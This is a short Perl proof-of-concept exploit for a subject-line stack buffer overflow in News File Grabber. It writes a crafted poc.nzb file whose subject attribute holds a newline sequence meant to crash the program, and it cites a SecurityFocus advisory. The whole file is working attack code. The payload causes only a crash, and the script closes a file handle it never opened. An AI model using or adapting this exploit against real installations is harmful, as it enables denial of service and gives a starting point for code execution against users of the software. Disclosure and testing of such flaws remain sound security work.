#!/usr/bin/perl
# ===============================================================================================
#                News File Grabber Subject Line Stack Buffer Overflow perl exploit 
#                               By Parveen vashishtha (parveen_vashishtha@yahoo.com)
# ==============================================================================================          
# Reference : http://www.securityfocus.com/bid/22617
#
# 
#
# Buffer overflow exists in Subject parameter of the .nzb file
# By Passing a newline char it crashes
# So here you go.
# 
#================================================================================================

use strict;

my($file_header)="<?xml version=\"1.0\" encoding=\"iso-8859-1\" ?>\n".
			"<!DOCTYPE nzb PUBLIC \"-//newzBin//DTD NZB 1.0//EN\" \"http://www.newzbin.com/DTD/nzb/nzb-1.0.dtd\">\n".
			"<!-- NZB Generated by Parveen Vashishtha -->\n".
			"<nzb xmlns=\"http://www.google.com\">\n\n";

my($file_end)="</segment>\n".
"</segments>\n".
"</file>\n".
"</nzb>\n";


open(OUTPUTFILE, ">poc.nzb");                        # Crafted .NZB file 
 
print OUTPUTFILE $file_header;                       # Writing Header

print OUTPUTFILE "<file poster=\"Poster\" date=\"1170609233\"\nsubject=\"";    # Vulnerable SUBJECT parameter

print OUTPUTFILE "\\n";

print OUTPUTFILE "\">\n<groups><group>some group</group></groups>\n<segments>\n<segment bytes=\"30\" number=\"1\">some name";
print OUTPUTFILE $file_end;                                     # End of file


close(OUTFILE);